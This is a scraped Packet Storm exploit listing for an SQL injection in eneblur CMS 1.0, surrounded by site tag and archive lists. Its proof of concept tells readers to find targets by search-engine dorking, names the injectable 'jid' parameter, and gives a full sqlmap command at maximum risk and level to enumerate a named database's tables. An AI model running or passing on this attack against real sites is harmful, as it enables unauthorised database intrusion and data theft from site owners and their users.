Security
Headlines
HeadlinesLatestCVEs

Headline

eneblur CMS 1.0 SQL Injection

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#google#ubuntu#linux#debian#cisco#java#php#perl#auth#ruby#firefox

eneblur CMS 1.0 SQL Injection

Posted Aug 8, 2023

Authored by indoushka

eneblur CMS version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | 4d67639c944054e33175ed2e55a36b45439dd449f6e73134fe454cc1d6a7bb71

Download | Favorite | View

eneblur CMS 1.0 SQL Injection

====================================================================================================================================| # Title     : eneblur CMS 1.0 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://www.eneblur.com/web-application-development.php                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /journal_details.php?jid= <===== inject here [+] D:\sqlmap>sqlmap.py -u http://127.0.0.1/wenvirobiotechjournalscom/journal_details.php?jid=3 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D envirobi_portal_server3Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

File Tags

  • ActiveX (932)
  • Advisory (81,913)
  • Arbitrary (16,188)
  • BBS (2,859)
  • Bypass (1,740)
  • CGI (1,026)
  • Code Execution (7,273)
  • Conference (679)
  • Cracker (841)
  • CSRF (3,342)
  • DoS (23,412)
  • Encryption (2,369)
  • Exploit (51,815)
  • File Inclusion (4,221)
  • File Upload (972)
  • Firewall (821)
  • Info Disclosure (2,766)
  • Intrusion Detection (892)
  • Java (3,043)
  • JavaScript (858)
  • Kernel (6,666)
  • Local (14,447)
  • Magazine (586)
  • Overflow (12,690)
  • Perl (1,423)
  • PHP (5,141)
  • Proof of Concept (2,338)
  • Protocol (3,601)
  • Python (1,535)
  • Remote (30,747)
  • Root (3,579)
  • Rootkit (508)
  • Ruby (612)
  • Scanner (1,639)
  • Security Tool (7,883)
  • Shell (3,180)
  • Shellcode (1,214)
  • Sniffer (894)
  • Spoof (2,206)
  • SQL Injection (16,359)
  • TCP (2,404)
  • Trojan (687)
  • UDP (891)
  • Virus (664)
  • Vulnerability (31,763)
  • Web (9,660)
  • Whitepaper (3,749)
  • x86 (962)
  • XSS (17,921)
  • Other

File Archives

  • August 2023
  • July 2023
  • June 2023
  • May 2023
  • April 2023
  • March 2023
  • February 2023
  • January 2023
  • December 2022
  • November 2022
  • October 2022
  • September 2022
  • Older

Systems

  • AIX (428)
  • Apple (2,002)
  • BSD (373)
  • CentOS (57)
  • Cisco (1,922)
  • Debian (6,808)
  • Fedora (1,692)
  • FreeBSD (1,244)
  • Gentoo (4,322)
  • HPUX (879)
  • iOS (351)
  • iPhone (108)
  • IRIX (220)
  • Juniper (67)
  • Linux (46,407)
  • Mac OS X (686)
  • Mandriva (3,105)
  • NetBSD (256)
  • OpenBSD (484)
  • RedHat (13,704)
  • Slackware (941)
  • Solaris (1,610)
  • SUSE (1,444)
  • Ubuntu (8,799)
  • UNIX (9,286)
  • UnixWare (186)
  • Windows (6,568)
  • Other

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution